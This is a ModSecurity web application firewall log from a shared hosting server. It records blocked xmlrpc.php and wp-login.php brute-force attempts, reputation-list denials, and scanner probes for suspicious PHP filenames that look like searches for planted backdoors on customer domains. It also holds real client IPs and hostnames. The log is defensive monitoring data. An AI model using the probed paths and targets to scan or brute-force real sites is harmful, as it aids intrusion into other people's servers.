[Tue May 26 19:27:42.219422 2026] [security2:error] [pid 49598:tid 49776] [client 85.208.96.198:18426] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-23rd/day/2025-06-08/"] [unique_id "ahWm1uzJzkdc0WtdrwtY7wAAALU"]
[Tue May 26 19:27:42.687854 2026] [security2:error] [pid 49598:tid 49790] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm1uzJzkdc0WtdrwtY8gAAAMM"]
[Tue May 26 19:27:42.796241 2026] [security2:error] [pid 49598:tid 49750] [client 91.245.236.124:34121] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm1uzJzkdc0WtdrwtZAwAAAJs"]
[Tue May 26 19:27:42.796354 2026] [security2:error] [pid 49598:tid 49750] [client 91.245.236.124:34121] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm1uzJzkdc0WtdrwtZAwAAAJs"]
[Tue May 26 19:27:43.452534 2026] [security2:error] [pid 49598:tid 49741] [client 4.241.228.159:2316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/info.php"] [unique_id "ahWm1-zJzkdc0WtdrwtZFwAAAJI"]
[Tue May 26 19:27:43.452643 2026] [security2:error] [pid 49598:tid 49741] [client 4.241.228.159:2316] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/info.php"] [unique_id "ahWm1-zJzkdc0WtdrwtZFwAAAJI"]
[Tue May 26 19:27:43.668338 2026] [security2:error] [pid 49598:tid 49731] [client 91.245.236.124:32653] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm1-zJzkdc0WtdrwtZHgAAAIg"]
[Tue May 26 19:27:43.668441 2026] [security2:error] [pid 49598:tid 49731] [client 91.245.236.124:32653] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm1-zJzkdc0WtdrwtZHgAAAIg"]
[Tue May 26 19:27:44.466064 2026] [security2:error] [pid 49598:tid 49806] [client 91.245.236.124:47583] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm2OzJzkdc0WtdrwtZNAAAANM"]
[Tue May 26 19:27:44.466165 2026] [security2:error] [pid 49598:tid 49806] [client 91.245.236.124:47583] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm2OzJzkdc0WtdrwtZNAAAANM"]
[Tue May 26 19:27:44.888430 2026] [security2:error] [pid 49598:tid 49790] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm2OzJzkdc0WtdrwtZMwAAAMM"]
[Tue May 26 19:27:45.124088 2026] [security2:error] [pid 49598:tid 49763] [client 4.241.228.159:2830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/ioxi-o.php"] [unique_id "ahWm2ezJzkdc0WtdrwtZQAAAAKg"]
[Tue May 26 19:27:45.124204 2026] [security2:error] [pid 49598:tid 49763] [client 4.241.228.159:2830] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/ioxi-o.php"] [unique_id "ahWm2ezJzkdc0WtdrwtZQAAAAKg"]
[Tue May 26 19:27:45.247306 2026] [security2:error] [pid 49598:tid 49830] [client 91.245.236.124:41031] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm2ezJzkdc0WtdrwtZQQAAAOs"]
[Tue May 26 19:27:45.247418 2026] [security2:error] [pid 49598:tid 49830] [client 91.245.236.124:41031] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm2ezJzkdc0WtdrwtZQQAAAOs"]
[Tue May 26 19:27:46.215495 2026] [security2:error] [pid 49598:tid 49748] [client 4.241.228.159:2818] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/011i.php"] [unique_id "ahWm2uzJzkdc0WtdrwtZUgAAAJk"]
[Tue May 26 19:27:46.215634 2026] [security2:error] [pid 49598:tid 49748] [client 4.241.228.159:2818] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/011i.php"] [unique_id "ahWm2uzJzkdc0WtdrwtZUgAAAJk"]
[Tue May 26 19:27:46.387378 2026] [security2:error] [pid 49598:tid 49754] [client 91.245.236.124:52005] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm2uzJzkdc0WtdrwtZVwAAAJ8"]
[Tue May 26 19:27:46.387543 2026] [security2:error] [pid 49598:tid 49754] [client 91.245.236.124:52005] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm2uzJzkdc0WtdrwtZVwAAAJ8"]
[Tue May 26 19:27:47.243891 2026] [security2:error] [pid 49598:tid 49734] [client 91.245.236.124:55605] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm2-zJzkdc0WtdrwtZbgAAAIs"]
[Tue May 26 19:27:47.244036 2026] [security2:error] [pid 49598:tid 49734] [client 91.245.236.124:55605] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm2-zJzkdc0WtdrwtZbgAAAIs"]
[Tue May 26 19:27:47.560402 2026] [security2:error] [pid 49598:tid 49643] [remote 216.73.216.30:44271] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWm2-zJzkdc0WtdrwtZfgAArCw"]
[Tue May 26 19:27:48.022207 2026] [security2:error] [pid 49598:tid 49839] [client 91.245.236.124:36179] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm3OzJzkdc0WtdrwtZjQAAAPQ"]
[Tue May 26 19:27:48.022306 2026] [security2:error] [pid 49598:tid 49839] [client 91.245.236.124:36179] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm3OzJzkdc0WtdrwtZjQAAAPQ"]
[Tue May 26 19:27:48.026770 2026] [security2:error] [pid 49598:tid 49741] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm2-zJzkdc0WtdrwtZgwAAAJI"]
[Tue May 26 19:27:48.093144 2026] [security2:error] [pid 49598:tid 49770] [client 4.241.228.159:2821] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/edit.php"] [unique_id "ahWm3OzJzkdc0WtdrwtZjgAAAK8"]
[Tue May 26 19:27:48.093254 2026] [security2:error] [pid 49598:tid 49770] [client 4.241.228.159:2821] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/edit.php"] [unique_id "ahWm3OzJzkdc0WtdrwtZjgAAAK8"]
[Tue May 26 19:27:48.788100 2026] [security2:error] [pid 49598:tid 49772] [client 91.245.236.124:31645] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm3OzJzkdc0WtdrwtZoAAAALE"]
[Tue May 26 19:27:48.788204 2026] [security2:error] [pid 49598:tid 49772] [client 91.245.236.124:31645] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm3OzJzkdc0WtdrwtZoAAAALE"]
[Tue May 26 19:27:49.212493 2026] [security2:error] [pid 49598:tid 49689] [remote 45.79.189.31:21190] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWm3ezJzkdc0WtdrwtZqwAA-1o"]
[Tue May 26 19:27:49.330365 2026] [security2:error] [pid 49598:tid 49760] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm3OzJzkdc0WtdrwtZqgAAAKU"]
[Tue May 26 19:27:49.549265 2026] [security2:error] [pid 49598:tid 49805] [client 91.245.236.124:39181] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm3ezJzkdc0WtdrwtZvAAAANI"]
[Tue May 26 19:27:49.549383 2026] [security2:error] [pid 49598:tid 49805] [client 91.245.236.124:39181] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm3ezJzkdc0WtdrwtZvAAAANI"]
[Tue May 26 19:27:49.716899 2026] [security2:error] [pid 49598:tid 49736] [client 4.241.228.159:2354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/sid3.php"] [unique_id "ahWm3ezJzkdc0WtdrwtZxgAAAI0"]
[Tue May 26 19:27:49.717017 2026] [security2:error] [pid 49598:tid 49736] [client 4.241.228.159:2354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/sid3.php"] [unique_id "ahWm3ezJzkdc0WtdrwtZxgAAAI0"]
[Tue May 26 19:27:50.764644 2026] [security2:error] [pid 49598:tid 49788] [client 91.245.236.124:19775] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm3uzJzkdc0WtdrwtZ1wAAAME"]
[Tue May 26 19:27:50.764766 2026] [security2:error] [pid 49598:tid 49788] [client 91.245.236.124:19775] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm3uzJzkdc0WtdrwtZ1wAAAME"]
[Tue May 26 19:27:50.989499 2026] [security2:error] [pid 49598:tid 49757] [client 4.241.228.159:2311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/load.php"] [unique_id "ahWm3uzJzkdc0WtdrwtZ6wAAAKI"]
[Tue May 26 19:27:50.989639 2026] [security2:error] [pid 49598:tid 49757] [client 4.241.228.159:2311] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/load.php"] [unique_id "ahWm3uzJzkdc0WtdrwtZ6wAAAKI"]
[Tue May 26 19:27:51.103326 2026] [security2:error] [pid 49598:tid 49686] [remote 212.227.60.37:49100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 37.60.227.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWm3uzJzkdc0WtdrwtZ6AAAhVc"]
[Tue May 26 19:27:51.532734 2026] [security2:error] [pid 49598:tid 49822] [client 91.245.236.124:61453] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm3-zJzkdc0WtdrwtZ-gAAAOM"]
[Tue May 26 19:27:51.532855 2026] [security2:error] [pid 49598:tid 49822] [client 91.245.236.124:61453] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm3-zJzkdc0WtdrwtZ-gAAAOM"]
[Tue May 26 19:27:51.612537 2026] [security2:error] [pid 49598:tid 49693] [remote 212.227.60.37:49100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 37.60.227.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWm3-zJzkdc0WtdrwtaAQAAjV4"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:27:52.083506 2026] [security2:error] [pid 49598:tid 49837] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm3-zJzkdc0WtdrwtaBAAAAPI"]
[Tue May 26 19:27:52.296809 2026] [security2:error] [pid 49598:tid 49850] [client 91.245.236.124:42753] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm4OzJzkdc0WtdrwtaDgAAAP8"]
[Tue May 26 19:27:52.296927 2026] [security2:error] [pid 49598:tid 49850] [client 91.245.236.124:42753] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm4OzJzkdc0WtdrwtaDgAAAP8"]
[Tue May 26 19:27:52.793785 2026] [security2:error] [pid 49598:tid 49735] [client 4.241.228.159:2840] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/166.php"] [unique_id "ahWm4OzJzkdc0WtdrwtaIgAAAIw"]
[Tue May 26 19:27:52.793892 2026] [security2:error] [pid 49598:tid 49735] [client 4.241.228.159:2840] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/166.php"] [unique_id "ahWm4OzJzkdc0WtdrwtaIgAAAIw"]
[Tue May 26 19:27:53.057272 2026] [security2:error] [pid 49598:tid 49845] [client 91.245.236.124:42797] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm4ezJzkdc0WtdrwtaKQAAAPo"]
[Tue May 26 19:27:53.057407 2026] [security2:error] [pid 49598:tid 49845] [client 91.245.236.124:42797] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm4ezJzkdc0WtdrwtaKQAAAPo"]
[Tue May 26 19:27:53.849729 2026] [security2:error] [pid 49598:tid 49823] [client 91.245.236.124:55647] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm4ezJzkdc0WtdrwtaPgAAAOQ"]
[Tue May 26 19:27:53.849863 2026] [security2:error] [pid 49598:tid 49823] [client 91.245.236.124:55647] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm4ezJzkdc0WtdrwtaPgAAAOQ"]
[Tue May 26 19:27:54.236421 2026] [security2:error] [pid 49598:tid 49780] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm4ezJzkdc0WtdrwtaPQAAALk"]
[Tue May 26 19:27:54.614326 2026] [security2:error] [pid 49598:tid 49793] [client 91.245.236.124:63793] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm4uzJzkdc0WtdrwtaVwAAAMY"]
[Tue May 26 19:27:54.614437 2026] [security2:error] [pid 49598:tid 49793] [client 91.245.236.124:63793] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm4uzJzkdc0WtdrwtaVwAAAMY"]
[Tue May 26 19:27:54.929594 2026] [security2:error] [pid 49598:tid 49746] [client 196.244.71.222:60675] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWm4uzJzkdc0WtdrwtaUAAAAJc"], referer: https://www.cagmedya.com/
[Tue May 26 19:27:55.389650 2026] [security2:error] [pid 49598:tid 49800] [client 91.245.236.124:9855] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm4-zJzkdc0WtdrwtadQAAAM0"]
[Tue May 26 19:27:55.389759 2026] [security2:error] [pid 49598:tid 49800] [client 91.245.236.124:9855] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm4-zJzkdc0WtdrwtadQAAAM0"]
[Tue May 26 19:27:55.419824 2026] [security2:error] [pid 49598:tid 49789] [client 4.241.228.159:2875] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/load.php"] [unique_id "ahWm4-zJzkdc0WtdrwtadwAAAMI"]
[Tue May 26 19:27:55.419913 2026] [security2:error] [pid 49598:tid 49789] [client 4.241.228.159:2875] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/load.php"] [unique_id "ahWm4-zJzkdc0WtdrwtadwAAAMI"]
[Tue May 26 19:27:55.591754 2026] [security2:error] [pid 49598:tid 49703] [remote 31.24.155.180:55512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.155.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWm4-zJzkdc0WtdrwtadgAAj2g"]
[Tue May 26 19:27:56.044211 2026] [security2:error] [pid 49598:tid 49809] [client 123.18.101.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWm4-zJzkdc0WtdrwtagAAAANY"]
[Tue May 26 19:27:56.153064 2026] [security2:error] [pid 49598:tid 49790] [client 91.245.236.124:47369] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm5OzJzkdc0WtdrwtamAAAAMM"]
[Tue May 26 19:27:56.153184 2026] [security2:error] [pid 49598:tid 49790] [client 91.245.236.124:47369] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm5OzJzkdc0WtdrwtamAAAAMM"]
[Tue May 26 19:27:56.458178 2026] [security2:error] [pid 49598:tid 49803] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm5OzJzkdc0WtdrwtalAAAANA"]
[Tue May 26 19:27:56.915508 2026] [security2:error] [pid 49598:tid 49819] [client 91.245.236.124:48267] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm5OzJzkdc0WtdrwtapQAAAOA"]
[Tue May 26 19:27:56.915657 2026] [security2:error] [pid 49598:tid 49819] [client 91.245.236.124:48267] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm5OzJzkdc0WtdrwtapQAAAOA"]
[Tue May 26 19:27:57.187636 2026] [security2:error] [pid 49598:tid 49776] [client 4.241.228.159:2367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/166.php"] [unique_id "ahWm5ezJzkdc0WtdrwtasgAAALU"]
